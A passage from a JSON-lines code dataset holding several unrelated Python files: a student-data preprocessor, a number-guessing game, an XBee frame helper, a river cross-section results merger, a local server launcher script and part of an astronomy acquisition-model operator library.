is_ascending_list are not the same'\n assert type(inplace) == bool, 'inplace is not a boolean'\n \n result = df.sort_values(attr_list, ascending=is_ascending_list, inplace=inplace)\n \n if (inplace):\n return df\n else:\n return result\n \n @staticmethod\n def get_nunique(df, attr, dropna=True):\n return df.loc[:, attr].nunique(dropna=dropna)\n \n @staticmethod\n def assign_idx_to_column_values(df, attr):\n df.loc[:, attr] = pd.Categorical(df.loc[:, attr]).codes\n \n @staticmethod\n def read_data_from_csv(datapath, encoding):\n return pd.read_csv(datapath, encoding=encoding)\n \n # 2d to 3d\n # result[i]: i-th sliding window 2d numpy array\n @staticmethod\n def rolling_window(a, window):\n shape = (a.shape[0]-window+1, window, a.shape[-1])\n strides = (a.strides[0],) + a.strides\n return np.lib.stride_tricks.as_strided(a, shape=shape, strides=strides)\n \n # for assistments 2012 dataset, correct values can be floating point between 0 and 1 for essay questions\n # for convenience for now, if it is greater than or equal to 0.5, then it is processed as correct\n # see \"https://sites.google.com/site/assistmentsdata/how-to-interpret\"\n @staticmethod\n def process_correct_attr(df, correct_attr):\n df.loc[df.loc[:, correct_attr] > 0.5].loc[:, correct_attr] = 1\n df.loc[:, correct_attr] = df.loc[:, correct_attr] // 1\n \n @staticmethod\n def save_rnn_data_as_csv(rnn_data, save_path):\n # rnn_students include all the information including num_steps and num_skills\n # just save rnn_students\n with open(save_path, 'w', newline='') as f:\n students = rnn_data[0]\n writer = csv.writer(f, delimiter=',', quoting=csv.QUOTE_NONNUMERIC)\n \n for student in students:\n row = []\n for i in student:\n row.append(i)\n\n writer.writerows(row)\n \n @staticmethod\n def save_rnn_data_as_pkl(rnn_data, save_path):\n obj = {\n 'students': rnn_data[0], \n 'num_steps': rnn_data[1], \n 'num_skills': rnn_data[2]\n }\n \n if (len(rnn_data) > 3):\n obj['problem_contents'] = rnn_data[3]\n \n with open(save_path, 'wb') as output_file:\n cPickle.dump(file=output_file, obj=obj)\n \n @staticmethod\n def load_rnn_data_from_pkl(pklpath):\n with open(pklpath, 'rb') as input_file:\n obj = cPickle.load(input_file)\n \n return obj\n \n @staticmethod\n def make_data_config(method='default', \n has_scaffolding=True, \n count_no_skill_id=True, \n has_test_mode=True, \n allow_multi_skills=True, \n window_length=10, one_hot=True):\n config = {\n 'method': method, \n 'has_scaffolding': has_scaffolding,\n 'count_no_skill_id': count_no_skill_id, \n 'has_test_mode': has_test_mode,\n 'allow_multi_skills': allow_multi_skills,\n 'one_hot': one_hot,\n 'window_length': window_length\n }\n \n return config","sub_path":"codes/DataPreprocessor.py","file_name":"DataPreprocessor.py","file_ext":"py","file_size_in_byte":21301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300130404","text":"# 1~100 임의 숫자를 맞추시오\n\nimport random\nguess_number = random.randint(1, 100)\nprint(guess_number)\n\nprint(\"숫자를 맞춰보세요.\")\nuser_input = int(input(\"숫자를 입력하세요.\"))\nwhile (user_input is not guess_number):\n if user_input > guess_number:\n print(\"숫자가 너무 큽니다.\")\n else:\n print(\"숫자가 너무 작습니다.\")\n user_input = int(input())\nelse:\n print(\"정답입니다.\", user_input, \"입니다.\")","sub_path":"Python/Basic/ch4/random_test.py","file_name":"random_test.py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"645714872","text":"from xbee import python2to3\n\ndef byteframe(byt):\n \"\"\"\n Automate setting frame length (byte number 3)\n and checksum (final byte)\n \"\"\"\n o = bytearray(b'\\x7E\\x00')\n o.append(len(byt))\n o.extend(byt)\n o.append(0xFF - (sum(map(python2to3.byteToInt, byt)) & 0xFF))\n return bytes(_escape(o))\n\ndef _escape(msg):\n \"\"\"\n escape any reserved characters in frame\n \"\"\"\n reserved = set((0x7E, 0x7D, 0x11, 0x13))\n def escaped_byte(byte):\n if byte in reserved:\n yield 0x7D\n yield byte^0x20\n else:\n yield byte\n escaped = bytearray([msg[0]])\n escaped.extend(escaped for byte in msg[1:] for escaped in escaped_byte(byte))\n\n return escaped\n","sub_path":"breadcrumbs/tests/frameutil.py","file_name":"frameutil.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"223936331","text":"###############################################################################################################################\n#\n# created by Russell-MDAP team March-September 2021\n# 05_HydXS_attachModelResults.py\n#\n# attaches the derived results from HydXS_output.py to the whole original XS dataset\n# single function: attach_HydXS\n#\n# INPUT: XS dataset from pre_processing + dataframe from HydXS_output.py (BankFull + BankLeft + BankRight + CountBankFull)\n# DOES: uses output from runs, and determines if each datapoint is under/above Bankfull (inRiver = True/False)\n# OUTPUT: dataframe = pre-processed XS data + InRiver + BankFull + BankLeft + BankRight + CountBankFull\n# where inRiver = True / False ; using Distance and BankLeft and BankRight\n#\n# example: XSdata4 = attach_HydXS( XSdata2, XSdata3_out )\n#\n###############################################################################################################################\n\nimport pandas as pd\n\ndef attach_HydXS ( xs , results ) :\n \n for i in range(1,max(xs[\"x_sec_id\"])+1):\n print(i)\n subset = xs[xs[\"x_sec_id\"] == i].reset_index()\n \n #initialise\n left = None\n right = None\n bankfull = None\n count = None\n #from HydXS results\n if not len(results[results[\"CrossSection\"]==i])==0 :\n left = float(results[\"LeftOutput\"][results[\"CrossSection\"]==i])\n right = float(results[\"RightOutput\"][results[\"CrossSection\"]==i])\n bankfull = float(results[\"BankFullOutput\"][results[\"CrossSection\"]==i])\n count = int(results[\"CountatBankFull\"][results[\"CrossSection\"]==i])\n\n #initialise\n subset[\"InRiver\"] = False\n subset[\"BankFull\"] = bankfull \n subset[\"BankLeft\"] = left \n subset[\"BankRight\"] = right \n subset[\"CountAtBankFull\"] = count\n #set true if between left and right boundaries\n for j in range(0,len(subset)):\n if not (left==None or right==None): \n if subset.loc[j,\"Distance\"] > left and subset.loc[j,\"Distance\"] < right:\n subset.loc[j,\"InRiver\"] = True\n else:\n subset[\"CountAtBankFull\"] = 0\n \n if i == 1 :\n output = subset\n else:\n output = output.append(subset,ignore_index=True)\n return output\n\n#end attach_HydXS","sub_path":"HydXS/HydXS_attachModelResults.py","file_name":"HydXS_attachModelResults.py","file_ext":"py","file_size_in_byte":2379,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"243907319","text":"from Port import isExist\nimport subprocess\n\ncmd = None\nif not isExist(11211):\n cmd = \"D:/memcached.exe\"\nif not isExist(7000):\n c = \"D:/pdlib-resin-3.0.14/httpd -Xmn256m -Xms512m -Xmx1024m -Xdebug -Xnoagent -Xrunjdwp:transport=dt_socket,server=y,suspend=n,address=8001 -conf conf/resin-product.conf\"\n if cmd == None:\n cmd = c\n else:\n cmd += \" & \"+c\n\nif cmd != None:\n proc = subprocess.Popen(cmd, shell=True)\n","sub_path":"Front.py","file_name":"Front.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"365028290","text":"# Copyrights 2010-2011 Pierre Chanial\n# All rights reserved\n#\ntry:\n import fftw3\nexcept:\n print('Warning: Library PyFFTW3 is not installed.')\n\nimport copy\nimport gc\nimport multiprocessing\nimport numpy as np\nimport scipy.signal\nimport scipy.sparse.linalg\nimport tamasisfortran as tmf\n\nfrom mpi4py import MPI\nfrom scipy.sparse.linalg.interface import LinearOperator\nfrom . import var\nfrom .datatypes import Map, Tod, combine_sliced_shape, flatten_sliced_shape, \\\n validate_sliced_shape\nfrom .numpyutils import _my_isscalar\nfrom .processing import interpolate_linear\nfrom .quantity import Quantity, UnitError, _divide_unit, _multiply_unit\nfrom .utils import diff, diffT, diffTdiff, shift\nfrom .mpiutils import split_shape, split_work\n\n__all__ = [\n 'AcquisitionModel',\n 'AcquisitionModelLinear',\n 'DistributionGlobal',\n 'DistributionLocal',\n 'CircularShift',\n 'Clip',\n 'CompressionAverage',\n 'Convolution',\n 'DdTdd',\n 'Diagonal',\n 'DiscreteDifference',\n 'DownSampling',\n 'Fft',\n 'FftHalfComplex',\n 'Identity',\n 'InterpolationLinear',\n 'InvNtt',\n 'Masking',\n 'Maximum',\n 'Minimum',\n 'Offset',\n 'Packing',\n 'Padding',\n 'Projection',\n 'Reshaping',\n 'ResponseTruncatedExponential',\n 'Rounding',\n 'Scalar',\n 'Shift',\n 'SqrtInvNtt',\n 'Unpacking',\n 'acquisitionmodel_factory',\n 'asacquisitionmodel',\n]\n\n\nclass ValidationError(Exception): pass\n\nclass AcquisitionModel(object):\n \"\"\"Abstract class representing an instrument acquisition model.\n\n The response y from an input signal x by an acquisition model M is given by\n y = M.direct(x) or y = M(x)\n where x and y can be multidimensional numpy.ndarray.\n An acquisition model can be the combination of several submodels\n describing various parts of the instrumental chain:\n M = M3 * M2 * M1 ...\n\n The direct method must not rely on input attributes (except Tod's nsamples\n if the acquisition model is unconstrained) since this method is supposed to\n work on bare ndarrays (in which case the acquisition model must be\n constrained: nsamples is extracted from the shapein property). Attribute\n handling must be dealt with in the AcquisitionModel's __init__ method via\n the attrin and attrout keywords.\n \"\"\"\n\n def __init__(self, direct=None, cache=False, dtype=None, description=None,\n attrin=None, attrout=None, shapein=None, shapeout=None, \n typein=None, typeout=None, unitin=None, unitout=None):\n\n if direct is not None:\n if not hasattr(direct, '__call__'):\n raise TypeError('The input direct method is not callable.')\n self.direct = direct\n self.dtype = dtype\n if description is None:\n description = self.__class__.__name__\n self.description = description\n self.attrin = {} if attrin is None else attrin\n self.attrout = attrout or self.attrin\n shapein = validate_sliced_shape(shapein)\n self.shapein = shapein\n shapeout = validate_sliced_shape(shapeout or shapein)\n self.shapeout = shapeout\n self.typein = typein\n self.typeout = typeout or typein\n self.unitin = Quantity(1., unitin )._unit\n self.unitout = Quantity(1., unitout or unitin)._unit\n\n self.cache = cache\n \n if isinstance(self, AcquisitionModelTranspose):\n return\n\n if cache:\n # store the input of the direct model. Its memory allocation\n # is re-used as the output of the transpose model\n self.cachein = None\n # store the input of the transpose model. Its memory allocation\n # is re-used as the output of the direct model\n self.cacheout = None\n else:\n if typein != (typeout or typein):\n raise ValueError('Inplace handling requires same input and ou' \\\n 'tput type (' + str(typein) + ',' + \\\n str(typeout or typein) + ').')\n if self.attrin != self.attrout:\n raise ValueError('Inplace handling requires same input and ou' \\\n 'tput attributes.')\n\n if shapein and type(shapein[-1]) is tuple:\n if not issubclass(typein, Tod):\n raise TypeError('The input type should be a Tod.')\n if shapeout and type(shapeout[-1]) is tuple:\n if not issubclass(typeout or typein, Tod):\n raise TypeError('The output type should be a Tod.')\n\n def __call__(self, input, inplace=False, cachein=False, cacheout=False):\n return self.direct(input, inplace, cachein, cacheout)\n\n def direct(self, input, inplace, cachein, cacheout):\n raise NotImplementedError()\n\n @property\n def shape(self):\n shape = (np.product(flatten_sliced_shape(self.shapeout)),\n np.product(flatten_sliced_shape(self.shapein)))\n if shape[0] is None or shape[1] is None:\n return None\n return shape\n\n @property\n def dtype(self):\n if self._dtype is not None:\n return self._dtype\n return var.FLOAT_DTYPE\n\n @dtype.setter\n def dtype(self, dtype):\n self._dtype = np.dtype(dtype)\n \n def validate_shapein(self, shapein):\n \"\"\"\n Validate input shape and return the output shape of the direct model\n \"\"\"\n selfshapein = self.shapein\n if shapein is None or shapein == selfshapein:\n return self.shapeout\n if selfshapein is None:\n return shapein\n if flatten_sliced_shape(shapein) == flatten_sliced_shape(selfshapein):\n return self.shapeout\n raise ValidationError('The input of ' + self.description + ' has an i' \\\n 'ncompatible shape ' + str(shapein) + '. Expected shape is ' + \\\n str(self.shapein) + '.')\n\n def validate_shapeout(self, shapeout):\n \"\"\"\n Validate input shape and return the output shape of the transpose model\n \"\"\"\n selfshapeout = self.shapeout\n if shapeout is None or shapeout == selfshapeout:\n return self.shapein\n if selfshapeout is None:\n return shapeout\n if flatten_sliced_shape(shapeout) == flatten_sliced_shape(selfshapeout):\n return self.shapein\n raise ValidationError(\"The input of '\" + self.description + \".T' has \" \\\n 'an incompatible shape ' + str(shapeout) + '. Expected shape is ' +\\\n str(self.shapeout) + '.')\n\n def validate_input_inplace(self, input, inplace):\n\n input = np.asanyarray(input)\n try:\n input = np.asanyarray(input, _get_dtype(self.dtype, input.dtype))\n except:\n raise TypeError(\"The input of '\" + self.description + \\\n \"' has a non-numeric type.\")\n\n shape = self.validate_shapein(validate_sliced_shape(input.shape, \n getattr(input, 'nsamples', None) or (self.shapein[-1] \\\n if self.shapein and type(self.shapein[-1]) is tuple else None)))\n if shape is None:\n raise ValidationError('The shape of the output of ' + \\\n self.description+' is not known.')\n\n typein = self.typein\n if shape and type(shape[-1]) is tuple and (typein is None or \\\n not issubclass(typein, Tod)):\n typein = Tod\n if typein is not None and not isinstance(input, typein):\n input = input.view(typein)\n if shape and type(shape[-1]) is tuple:\n input.nsamples = shape[-1]\n\n if not inplace:\n if var.verbose:\n print('Info: Allocating ' + input.dtype.type.__name__ + \\\n str(input.shape).replace(' ','') + ' = ' + \\\n str(input.dtype.itemsize * input.size / 2.**20) + \\\n ' MiB in ' + self.description + '.')\n try:\n input = input.copy()\n except MemoryError:\n gc.collect()\n input = input.copy()\n\n for k,v in self.attrin:\n setattr(input, k, v)\n\n return input\n\n def validate_input_direct(self, input, cachein, cacheout):\n\n def set_cachein(cache):\n self.cachein = cache\n def set_cacheout(cache):\n self.cacheout = cache\n\n return self.validate_input_cache(input, self.description,\n cachein, cacheout,\n self.attrin, self.attrout,\n self.cachein, self.cacheout,\n set_cachein, set_cacheout,\n self.shapein, self.shapeout,\n self.typein, self.typeout,\n self.unitin, self.unitout,\n lambda shape: self.validate_shapein(shape))\n\n def validate_input_transpose(self, input, cachein, cacheout):\n\n def set_cachein(cache):\n self.cachein = cache\n def set_cacheout(cache):\n self.cacheout = cache\n\n return self.validate_input_cache(input, self.description + '.T',\n cachein, cacheout,\n self.attrout, self.attrin,\n self.cacheout, self.cachein,\n set_cacheout, set_cachein,\n self.shapeout, self.shapein,\n self.typeout, self.typein,\n self.unitout, self.unitin,\n lambda shape: self.validate_shapeout(shape))\n\n def validate_input_cache(self, input, description,\n do_cachein, do_cacheout,\n attrin, attrout,\n cachein, cacheout,\n set_cachein, set_cacheout,\n shapein, shapeout,\n typein, typeout,\n unitin, unitout,\n validate_input_shape):\n\n input = np.array(input, ndmin=1, subok=True, copy=False)\n try:\n input = np.asanyarray(input, _get_dtype(self.dtype, input.dtype))\n except:\n raise TypeError(\"The input of '\" + description + \"' has a non-num\" \\\n 'eric type.')\n\n shapein = validate_sliced_shape(input.shape, getattr(input, 'nsamples',\\\n None) or (shapein[-1] if shapein and type(shapein[-1]) is tuple \\\n else None))\n shapeout = validate_input_shape(shapein)\n\n if type(shapein[-1]) is tuple and (typein is None or \\\n not issubclass(typein, Tod)):\n typein = Tod\n if typein is not None and not isinstance(input, typein):\n input = input.view(typein)\n if shapein and type(shapein[-1]) is tuple:\n input.nsamples = shapein[-1]\n\n if do_cachein and id(input) != id(cachein):\n # validate input before storing it (nsamples is not enforced)\n _validate_input_unit(input, unitin)\n for k,v in attrin.items():\n setattr(input, k, v)\n \n # store it\n set_cachein(input)\n\n # get output from the cache\n shapeout_flat = flatten_sliced_shape(shapeout)\n if do_cacheout and cacheout is not None and \\\n shapeout_flat == cacheout.shape and cacheout.dtype == input.dtype:\n output = cacheout\n\n else:\n\n # allocate output\n if var.verbose:\n reason = 'cache not requested' if not do_cacheout else \\\n 'empty cache' if cacheout is None else \\\n 'type mismatch' if cacheout.dtype != input.dtype else \\\n 'shape mismatch'\n print('Info: Allocating ' + self.dtype.type.__name__ + \\\n str(shapeout_flat).replace(' ','') + ' = ' + \\\n str(input.dtype.itemsize * np.product(shapeout_flat) \\\n / 2.**20) + ' MiB in ' + description + ' (' + reason + \\\n ').')\n if typeout is None:\n typeout = input.__class__\n if type(shapeout[-1]) is tuple and not issubclass(typeout, Tod):\n typeout = Tod\n if hasattr(typeout, 'empty'):\n try:\n output = typeout.empty(shapeout, dtype=self.dtype)\n except MemoryError:\n gc.collect()\n output = typeout.empty(shapeout, dtype=self.dtype)\n else:\n try:\n output = np.empty(shapeout_flat, self.dtype)\n except MemoryError:\n gc.collect()\n output = np.empty(shapeout_flat, self.dtype)\n\n # store output\n if do_cacheout:\n set_cacheout(output)\n\n if type(shapeout[-1]) is tuple:\n output = Tod(output, nsamples=shapeout[-1], copy=False)\n\n _propagate_attributes(input, output, unitin, unitout, attrout)\n\n return input, output\n\n def __mul__(self, other):\n if isinstance(other, np.ndarray):\n return self.matvec(other)\n return Composition([self, other])\n\n def __rmul__(self, other):\n if not _my_isscalar(other):\n raise NotImplementedError(\"It is not possible to multiply '\" + \\\n str(type(other)) + \"' with an AcquisitionModel.\")\n return Composition([other, self])\n\n def __imul__(self, other):\n _tocompositemodel(self, Composition, [copy.copy(self), other])\n return self\n\n def __add__(self, other):\n return Addition([self, other])\n\n def __radd__(self, other):\n return Addition([other, self])\n\n def __iadd__(self, other):\n _tocompositemodel(self, Addition, [copy.copy(self), other])\n return self\n\n def __sub__(self, other):\n return Addition([self, -other])\n\n def __rsub__(self, other):\n return Addition([other, -self])\n\n def __isub__(self, other):\n _tocompositemodel(self, Addition, [copy.copy(self), -other])\n return self\n\n def __neg__(self):\n return Scalar(-1.) * self\n\n def __str__(self):\n result = self.description\n if type(self) == Identity:\n result += ' (Identity)'\n if self.shapein is not None or self.shapeout is not None:\n result += ' [input:'\n if self.shapein is None:\n result += 'unconstrained'\n else:\n result += str(self.shapein).replace(' ','')\n result += ', output:'\n if self.shapeout is None:\n result += 'unconstrained'\n else:\n result += str(self.shapeout).replace(' ','')\n result += ']'\n return result\n\n\n#-------------------------------------------------------------------------------\n\n\nclass AcquisitionModelLinear(AcquisitionModel, LinearOperator):\n \"\"\"Abstract class representing a linear instrument acquisition model.\n\n The response y from an input signal x by an acquisition model M is given by\n y = M.direct(x) or y = M(x)\n where x and y can be multidimensional numpy.ndarray.\n The transpose of the acquisition model is\n x = M.transpose(y) or M.T(y)\n This class subclasses the LinearOperator class, so it also provides the\n methods matvec and rmatvec which operate on 1d ndarray.\n\n An acquisition model can be the combination of several submodels\n describing various parts of the instrumental chain:\n M = M3 * M2 * M1 ...\n \"\"\"\n def __init__(self, transpose=None, **keywords):\n AcquisitionModel.__init__(self, **keywords)\n if transpose is not None:\n if not hasattr(transpose, '__call__'):\n raise TypeError('The input transpose method is not callable.')\n self.transpose = transpose\n\n def transpose(self, input, inplace, cachein, cacheout):\n raise NotImplementedError()\n\n def matvec(self, v, inplace=False, cachein=False, cacheout=False):\n v = v.reshape(flatten_sliced_shape(self.shapein))\n return self.direct(v, inplace, cachein, cacheout).ravel()\n\n def rmatvec(self, v, inplace=False, cachein=False, cacheout=False):\n v = v.reshape(flatten_sliced_shape(self.shapeout))\n return self.transpose(v, inplace, cachein, cacheout).ravel()\n\n def dense(self):\n d = np.ndarray(self.shape, dtype=self.dtype)\n v = np.zeros(self.shape[1], dtype=var.FLOAT_DTYPE)\n for i in range(self.shape[1]):\n v[:] = 0\n v[i] = 1\n d[:,i] = self.matvec(v, inplace=True, cachein=True, cacheout=True)\n return d\n\n @property\n def T(self):\n return AcquisitionModelTranspose(self)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass AcquisitionModelTranspose(AcquisitionModelLinear):\n\n def __init__(self, model):\n self.model = model\n AcquisitionModelLinear.__init__(self,\n direct=model.transpose,\n transpose=model.direct,\n cache=model.cache,\n dtype=model.dtype,\n description=model.description + '.T',\n attrin=model.attrout,\n attrout=model.attrin,\n shapein=model.shapeout,\n shapeout=model.shapein,\n typein=model.typeout,\n typeout=model.typein,\n unitin=model.unitout,\n unitout=model.unitin)\n\n @property\n def cachein(self):\n return self.model.cacheout\n\n @cachein.setter\n def cachein(self, cache):\n self.model.cacheout = cache\n \n @property\n def cacheout(self):\n return self.model.cachein\n\n @cacheout.setter\n def cacheout(self, cache):\n self.model.cachein = cache\n \n @property\n def T(self):\n return self.model\n\n def validate_shapein(self, shapein):\n return self.model.validate_shapeout(shapein)\n\n def validate_shapeout(self, shapeout):\n return self.model.validate_shapein(shapeout)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Composite(AcquisitionModel):\n \"\"\"\n Class for grouping acquisition models\n \"\"\"\n\n def __init__(self, models):\n\n models = [ asacquisitionmodel(m) for m in models ]\n self.blocks = []\n\n for model in models:\n if isinstance(model, self.__class__):\n self.blocks.extend(model.blocks)\n else:\n self.blocks.append(model)\n\n AcquisitionModel.__init__(self)\n\n if all([hasattr(m, 'matvec') for m in self.blocks]):\n self.matvec = \\\n lambda v, inplace=False, cachein=False, cacheout=False: \\\n self.direct(v.reshape(flatten_sliced_shape(self.shapein)),\n inplace, cachein, cacheout).ravel()\n def dense():\n d = np.ndarray(self.shape, dtype=self.dtype)\n v = np.zeros(self.shape[1], dtype=var.FLOAT_DTYPE)\n for i in range(self.shape[1]):\n v[:] = 0\n v[i] = 1\n d[:,i] = self.matvec(v, True, True, True)\n return d\n self.dense = dense\n\n if all([hasattr(m, 'rmatvec') for m in self.blocks]):\n self.rmatvec = \\\n lambda v, inplace=False, cachein=False, cacheout=False: \\\n self.transpose(v.reshape(flatten_sliced_shape(\n self.shapeout)), inplace, cachein, cacheout).ravel()\n\n @property\n def dtype(self):\n for block in self.blocks:\n if block.dtype.type in (np.complex64, np.complex128, np.complex256):\n return block.dtype\n return var.FLOAT_DTYPE\n\n @dtype.setter\n def dtype(self, dtype):\n pass\n\n @property\n def T(self):\n return AcquisitionModelTranspose(self)\n\n @property\n def typein(self):\n for model in reversed(self.blocks):\n if model.typein is not None:\n return model.typein\n return np.ndarray\n\n @typein.setter\n def typein(self, value):\n pass\n\n @property\n def typeout(self):\n for model in reversed(self.blocks):\n if model.typeout is not None:\n return model.typeout\n return np.ndarray\n\n @typeout.setter\n def typeout(self, value):\n pass\n\n @property\n def unitin(self):\n for model in reversed(self.blocks):\n if len(model.unitin) > 0:\n return model.unitin\n return {}\n\n @unitin.setter\n def unitin(self, value):\n pass\n\n @property\n def unitout(self):\n for model in self.blocks:\n if len(model.unitout) > 0:\n return model.unitout\n return {}\n\n @unitout.setter\n def unitout(self, value):\n pass\n\n def validate_input(self, input, shape):\n input = np.array(input, ndmin=1, subok=True, copy=False)\n if shape is not None and type(shape[-1]) is tuple:\n input = Tod(input, nsamples=shape[-1], copy=False)\n return input\n\n def __str__(self):\n result = AcquisitionModel.__str__(self) + ':'\n components = []\n for block in self.blocks:\n components.extend(str(block).split('\\n'))\n result += '\\n '+'\\n '.join(components)\n return result\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Addition(Composite):\n \"\"\"\n Class for acquisition models addition\n\n If at least one of the input already is the result of an addition,\n a flattened list of operators is created by associativity, in order to\n benefit from the AcquisitionModel's caching mechanism.\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapein)\n output = self.blocks[0].direct(input, False, False, False)\n for i, model in enumerate(self.blocks[1:]):\n last = i == len(self.blocks) - 2\n tmf.add_inplace(np.array(output, ndmin=1, copy=False).T,\n np.array(model.direct(input, inplace and last,\n cachein, cacheout), ndmin=1, copy=False).T)\n return output\n\n def transpose(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapeout)\n output = self.blocks[0].transpose(input, False, False, False)\n for i, model in enumerate(self.blocks[1:]):\n last = i == len(self.blocks) - 2\n tmf.add_inplace(np.array(output, ndmin=1, copy=False).T,\n np.array(model.transpose(input, inplace and last,\n cachein, cacheout), ndmin=1, copy=False).T)\n return output\n\n @property\n def shapein(self):\n shapein = None\n for model in self.blocks:\n shapein_ = model.shapein\n if shapein_ is None:\n continue\n if shapein is None or type(shapein_[-1]) is tuple:\n shapein = shapein_\n continue\n if flatten_sliced_shape(shapein) != flatten_sliced_shape(shapein_):\n raise ValidationError(\"Incompatible shape in operands: '\" + \\\n str(shapein) +\"' and '\" + str(shapein_) + \"'.\")\n return shapein\n\n @shapein.setter\n def shapein(self, value):\n pass\n\n @property\n def shapeout(self):\n shapeout = None\n for model in self.blocks:\n shapeout_ = model.shapeout\n if shapeout_ is None:\n continue\n if shapeout is None or type(shapeout_[-1]) is tuple:\n shapeout = shapeout_\n continue\n if flatten_sliced_shape(shapeout) != \\\n flatten_sliced_shape(shapeout_):\n raise ValidationError(\"Incompatible shape in operands: '\" + \\\n str(shapeout) +\"' and '\" + str(shapeout_) + \"'.\")\n return shapeout\n\n @shapeout.setter\n def shapeout(self, value):\n pass\n\n @property\n def T(self):\n return Addition([model.T for model in self.blocks])\n\n def __iadd__(self, other):\n oldblocks = self.blocks\n if isinstance(other, Addition):\n self.blocks.extend(other.blocks)\n else:\n self.blocks.append(asacquisitionmodel(other))\n try:\n shapein = self.shapein\n shapeout = self.shapeout\n except ValidationError as errmsg:\n self.blocks = oldblocks\n raise ValidationError(errmsg)\n return self\n\n def __isub__(self, other):\n return self.__iadd__(-other)\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Composition(Composite):\n \"\"\"\n Class for acquisition models composition\n\n If at least one of the input already is the result of a composition,\n a flattened list of operators is created by associativity, in order to\n benefit from the AcquisitionModel's caching mechanism.\n \"\"\"\n\n def direct(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapein)\n caches = [m.cache for m in self.blocks]\n if any(caches):\n first_cache = caches.index(True)\n last_cache = len(self.blocks) - caches.index(True) - 1\n else:\n first_cache = len(self.blocks)\n last_cache = -1\n for i, model in enumerate(reversed(self.blocks)):\n input = model.direct(input, inplace or i != 0,\n cachein or i > first_cache,\n cacheout or i < last_cache)\n return input\n\n def transpose(self, input, inplace, cachein, cacheout):\n input = self.validate_input(input, self.shapeout)\n caches = [m.cache for m in self.blocks]\n first_cache = len(self.blocks) - caches.index(True) - 1\n last_cache = caches.index(True)\n for i, model in enumerate(self.blocks):\n input = model.transpose(input, inplace or i != 0,\n cachein or i > first_cache,\n cacheout or i < last_cache)\n return input\n\n @property\n def shapein(self):\n shapeout = None\n for model in self.blocks:\n shapeout = model.validate_shapeout(shapeout)\n return shapeout\n\n @shapein.setter\n def shapein(self, value):\n pass\n\n @property\n def shapeout(self):\n shapein = None\n for model in reversed(self.blocks):\n shapein = model.validate_shapein(shapein)\n return shapein\n\n @shapeout.setter\n def shapeout(self, value):\n pass\n\n @property\n def T(self):\n return Composition([model.T for model in reversed(self.blocks)])\n\n def __imul__(self, other):\n oldblocks = self.blocks\n self.blocks.append(asacquisitionmodel(other))\n try:\n shapein = self.shapein\n shapeout = self.shapeout\n except ValidationError as errmsg:\n self.blocks = oldblocks\n raise ValidationError(errmsg)\n return self\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Square(object):\n \"\"\"\n Square operator\n \n The input and output must have the same shape\n This operator does not implement the cache mechanism, but operation on\n the input can be done inplace or on a copy.\n \"\"\"\n\n def __init__(self, shapein=None, **keywords):\n self.shapeout = shapein\n self.validate_shapeout = self.validate_shapein\n \n\n#-------------------------------------------------------------------------------\n\n\nclass Symmetric(AcquisitionModelLinear, Square):\n \"\"\"Symmetric operator\"\"\"\n\n def __init__(self, **keywords):\n AcquisitionModelLinear.__init__(self, **keywords)\n Square.__init__(self, **keywords)\n self.transpose = self.direct\n self.rmatvec = self.matvec\n\n @property\n def T(self):\n return self\n\n\n#-------------------------------------------------------------------------------\n\n\nclass Diagonal(Symmetric):\n \"\"\"\n Diagonal operator.\n\n Multiply by a diagonal matrix. The input of a Diagonal instance can be of\n rank greater than the specified diagonal array, in which case the latter\n is broadcast along the fast dimensions.\n \"\"\"\n\n def __init__(self, diagonal, **keywords):\n diagonal = np.array(diagonal, dtype=var.get_default_dtype(diagonal),\n order='c')\n Symmetric.__init__(self, dtype=diagonal.dtype, **keywords)\n self.isscalar = diagonal.ndim == 0\n self.data = np.array(diagonal, ndmin=1, copy=False)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n if self.dtype == var.FLOAT_DTYPE:\n tmf.multiply_inplace(output.T, self.data.T)\n else:\n output.T[:] *= self.data.T\n return output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return self.shapein\n if self.isscalar:\n return shapein\n if flatten_sliced_shape(shapein[0:self.data.ndim]) != self.data.shape:\n raise ValueError('The input has an incompatible shape ' + \\\n str(shapein) + '.')\n return shapein\n\n def matvec(self, v, inplace=False, cachein=False, cacheout=False):\n shape = list(self.data.shape)\n shape.append(-1)\n v = v.reshape(shape)\n return self.direct(v, inplace, cachein, cacheout).ravel()\n\n\nclass Offset(AcquisitionModel, Square):\n \"\"\"\n Offset operator.\n\n Add an offset to the input. The input of an Offset instance can be of rank\n greater than the specified diagonal array, in which case the latter is\n broadcast along the fast dimensions. This operator is not linear.\n \"\"\"\n def __init__(self, offset, **keywords):\n offset = np.array(offset, dtype=var.get_default_dtype(offset),\n order='c')\n AcquisitionModel.__init__(self, dtype=offset.dtype, **keywords)\n Square.__init__(self, **keywords)\n self.isscalar = offset.ndim == 0\n self.data = np.array(offset, ndmin=1, copy=False)\n\n def direct(self, input, inplace, cachein, cacheout):\n output = self.validate_input_inplace(input, inplace)\n if self.dtype == var.FLOAT_DTYPE:\n tmf.add_inplace(output.T, self.data.T)\n else:\n output.T[:] += self.data.T\n return output\n\n def validate_shapein(self, shapein):\n if shapein is None:\n return self.shapein\n if self.isscalar:\n return shapein\n if flatten_sliced_shape(shapein[0:self.data.ndim]) != self.data.shape:\n raise ValueError('The input has an incompatible shape ' + \\\n str(shapein) + '.')\n return shapein\n\n def matvec(self, v, inplace=False, cachein=False, cacheout=False):\n shape = list(self.data.shape)\n shape.append(-1)\n v = v.reshape(shape)\n return self.direct(v, 